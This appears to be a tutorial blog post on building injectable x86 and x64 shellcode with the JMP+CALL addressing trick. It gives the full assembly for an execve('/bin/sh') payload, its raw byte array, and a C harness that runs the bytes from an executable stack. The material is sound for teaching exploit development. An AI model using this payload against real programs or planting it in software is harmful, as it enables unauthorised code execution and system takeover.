One challenging aspect of creating a shellcode is dealing with addresses. Your shellcode will often need to reference certain locations, which gets complicated when working in the context of the program you are injecting into. These problems can be solved using a few tricks;
The JMP + CALL trick
One simple way of solving address challenges when writing a shellcode is by taking advantage of how the JMP
and CALL
instructions work. In this approach, relative jumps, which are just jumps that are followed by an offset (number of bytes/opcodes to skip AFTER the current JMP
instruction, basically EIP + offset
) instead of a full address, are used to control the flow of execution in a way that’s independent of the execution context. This allows the shellcode to be injected anywhere without affecting the execution flow. Let’s have a look into how relative jumps work with the following example;
1
2
3
4
5
6
7
8
9
10
section .text
global _start
_start:
jmp target
nop
nop
target:
mov eax, 0xdead
When the above code is assembled, the JMP
instruction generated uses an offset to target
, not an address. Notice that there are two NOP
instructions between the JMP
instruction and target
, and each NOP
instruction assembles to 1 byte (0x90
), so our JMP
offset is 2 as we need to skip these bytes (eb
is the JMP
instruction and 02
is the offset);
The CALL
instruction, which is used to call functions, works quite similarly to the JMP
instruction with one key difference: CALL
pushes the address of the next instruction (return address) onto the stack before jumping to the target location, while JMP
simply modifies the instruction pointer to go to the target location. Saving the return address allows the called function to hand control back to the caller using the RET
instruction, which simply pops the return address from the stack and jump to it.
These two instructions can help us solve the address challenge when writing shellcodes using the following steps;
- Start our shellcode with a short
JMP
to aCALL
instruction to setup relative addressing. CALL
another offset within the same shellcode that contains the main code of our shellcode.- Read the address stored at the top of the stack by the
CALL
instruction. This address will be pointing to a known position near or at the end of the shellcode, and we can use it to dynamically calculate other offsets at runtime.
Here is the layout;
1
2
3
4
5
6
7
8
9
_start:
jmp loc1
shellcode:
---[ main code]---
loc1:
call shellcode
---[ Your ref point that will be pushed onto the stack ]---
_start
marks the shellcode’s entrypoint, shellcode
is our main shellcode body, and loc1
is where we make the call to get our reference address onto the stack.
With that in mind, we can write a simple injectable shellcode that uses execve()
syscall to spawn a /bin/sh
shell. execve()
is defined in the unistd.h
header file, and is used to execute other programs. The function accepts three arguments;
1
int execve(const char *pathname, char *const argv[], char *const envp[]);
pathname
: This is the full path of the program you want to execute.argv[]
: An array of strings containing the path of the program, and any other argument to pass to the program. Should be null-terminated.envp[]
: An array of strings containing any environment variables you wish to pass to the program. Can be null.
Since we are working in x86 (32-bit) assembly shellcode, we’ll need to rely on making a direct system call (syscall) to use this function. To do this, we need to;
- Set
EAX
to0x0b
, which is the code forexecve()
syscall. - Set
EBX
to a pointer to a string. This is thepathname
argument. - Set
ECX
to a pointer to an array of pointers. This is theargv[]
argument. - Set
EDX
to a pointer to an array of pointers. This is theenvp[]
argument, which can be null.
For our /bin/sh
shellcode, we start by creating a basic x86 program (I’m using NASM), and setup the first jump;
1
2
3
4
5
section .text
global _start
_start:
jmp loc1
Then we define loc1
(our JMP
destination) with the CALL
instruction and the data we are starting with (/bin/shA
where A
is just a placeholder that we will replace with a null at runtime). Note that db
isn’t a typical assembly instruction. The assembler simply embeds the given bytes at that position in the output binary, so the immediate bytes after the opcodes of call shellcode
will be 2f 62 69 6e 2f 73 68 41
, which is hex for /bin/shA
;
1
2
3
loc1:
call shellcode
db "/bin/shA"
This block will load the address of /bin/shA
onto the stack, which we can get by de-referencing the pointer in ESP
.
Now for the main shellcode. First thing we need to do is obtain the address to /bin/shA
, null-terminate it, and push it onto the stack. Then move it’s address into EBX
to serve as our pathname
;
1
2
3
4
5
6
7
shellcode:
pop ebx ; Get the address of our /bin/shA
xor eax, eax ; For runtime nulling :)
push dword [ebx + 4] ; Push '/shA' into the stack
push dword [ebx] ; Push '/bin' into the stack. We now have /bin/shA on top
mov byte [esp + 7], al ; Overwrite the 'A' placeholder to null-terminate
mov ebx, esp ; First arg (filename) of execve() = /bin/sh
Next we need to setup our argv[]
for the syscall. Since this is just a null-terminated array of string pointers, we can leverage the stack to create it by pushing a NULL to it, followed by the same address we used for pathname
, then save it’s stack address in ECX
;
1
2
3
4
; Build the *argv[] array on the stack
push eax ; NULL
push ebx ; /bin/sh
mov ecx, esp ; ECX = {"/bin/sh", NULL}
We then set envp[]
to null since we don’t need it;
1
mov edx, eax ; EDX = NULL
Finally, we execute the syscall;
1
2
mov al, 0x0b ; 0x0b (11) = execve() syscall
int 0x80 ; Y33T!!!
The complete code;
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
section .text
global _start
_start:
jmp loc1
shellcode:
pop ebx ; Get the address of our /bin/shA
xor eax, eax ; For runtime nulling :)
push dword [ebx + 4] ; Push '/shA' into the stack
push dword [ebx] ; Push '/bin' into the stack. We now have /bin/shA on top
mov byte [esp + 7], al ; Overwrite the 'A' placeholder to null-terminate
mov ebx, esp ; First arg (filename) of execve() = /bin/sh
mov edx, eax ; EDX = NULL
; Build the *argv[] array on the stack
push eax ; NULL
push ebx ; /bin/sh
mov ecx, esp ; ECX = {"/bin/sh", NULL}
mov al, 0x0b ; 0x0b (11) = execve() syscall
int 0x80 ; Y33T!!!
loc1:
call shellcode ; Jump to main body and save our reference address.
db "/bin/shA" ; Our reference address.
I saved this as test.asm
. Time to assemble and test (Note: I’m working on an x64 system, and building for x86, hence the need to declare architecture in the following commands);
1
2
nasm -f elf32 test.asm -o test.o
ld -m elf_i386 test.o -o test
Everything looks good :) But we are running it as a standalone ELF binary. To covert it into a shellcode, we need to extract our opcodes of interest only. Disassembling the binary using objdump
shows that the .text
section holds all our code of interest;
1
objdump -D -Mintel test
Note that the instructions highlighted in red look weird. These aren’t actual instructions, but rather the bytes we embedded (/bin/shA
) using the db
instruction.
We now need to extract these opcodes. Many ways to go about this, but I personally prefer objcopy
when extracting a whole section;
1
objcopy -O binary --only-section=.text test shellcode.bin
The file shellcode.bin
contains our raw shellcode. We can use a disassembler to confirm if everything looks good. I use rasm2
(part of Radare2) when dealing with shellcodes;
1
rasm2 -d -B -f shellcode.bin
Looks good. Now we need check if this shellcode is injectable. We can use a simple C program to test this. First, we need to format this code into a C array. We can achieve this using the -i
option of xxd
;
1
xxd -i shellcode.bin
1
2
3
4
5
6
unsigned char shellcode_bin[] = {
0xeb, 0x18, 0x5b, 0x31, 0xc0, 0xff, 0x73, 0x04, 0xff, 0x33, 0x88, 0x44,
0x24, 0x07, 0x89, 0xe3, 0x89, 0xc2, 0x50, 0x53, 0x89, 0xe1, 0xb0, 0x0b,
0xcd, 0x80, 0xe8, 0xe3, 0xff, 0xff, 0xff, 0x2f, 0x62, 0x69, 0x6e, 0x2f,
0x73, 0x68, 0x41
};
We can now write a simple tester for the above shellcode;
1
2
3
4
5
6
7
8
9
10
11
12
13
#include <stdio.h>
#include <string.h>
void main(){
unsigned char shellcode_bin[] = {
0xeb, 0x18, 0x5b, 0x31, 0xc0, 0xff, 0x73, 0x04, 0xff, 0x33, 0x88, 0x44,
0x24, 0x07, 0x89, 0xe3, 0x89, 0xc2, 0x50, 0x53, 0x89, 0xe1, 0xb0, 0x0b,
0xcd, 0x80, 0xe8, 0xe3, 0xff, 0xff, 0xff, 0x2f, 0x62, 0x69, 0x6e, 0x2f,
0x73, 0x68, 0x41
};
int (*ret)() = (int(*)())shellcode_bin;
ret();
}
Compile the program. Make sure you disable NX (non-executable stack) with -z execstack
flag or the program will segfault;
1
gcc tester.c -o tester -m32 -z execstack
And it worked! We made an x86 injectable shellcode that shows how to use the JMP + CALL
trick to solve addressing issues :)
We can also port this shellcode for x64 (64-bit) systems. All we need to do is update the name of the registers, and use the x64 syscall for execve()
.
Under x64, the syscall
instruction is used for making system calls, with the syscall code stored in RAX
. Arguments are passed in registers, staring with RDI
, then RSI
, RDX
, and the rest. To make an execve()
syscall under x64;
- Set
RAX
to0x3b
- Set
RDI
to the full path of the program to execute (/bin/sh
) - Set
RSI
to theargv[]
array. - Set
RDX
to theenvp[]
array. Can be null. - Call
syscall
The modified shellcode for x64;
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
section .text
global _start
_start:
jmp loc1
shellcode:
pop rbx
xor rax, rax ; For nulling.
push qword [rbx] ; RSP = '/bin/shA'
mov byte [rsp + 7], al ; Null-terminate.
mov rdi, rsp ; rdi = '/bin/sh'
; Setup argv[]
push rax
push rdi
mov rsi, rsp ; rsi = {"/bin/sh", NULL}
; Setup envp[]
mov rdx, rax ; rdx = NULL
; Make the syscall
mov al, 0x3b ; 0x3b = execve() syscall code
syscall
loc1:
call shellcode
db "/bin/shA"
Same steps discussed above can be used to extract and test the shellcode :)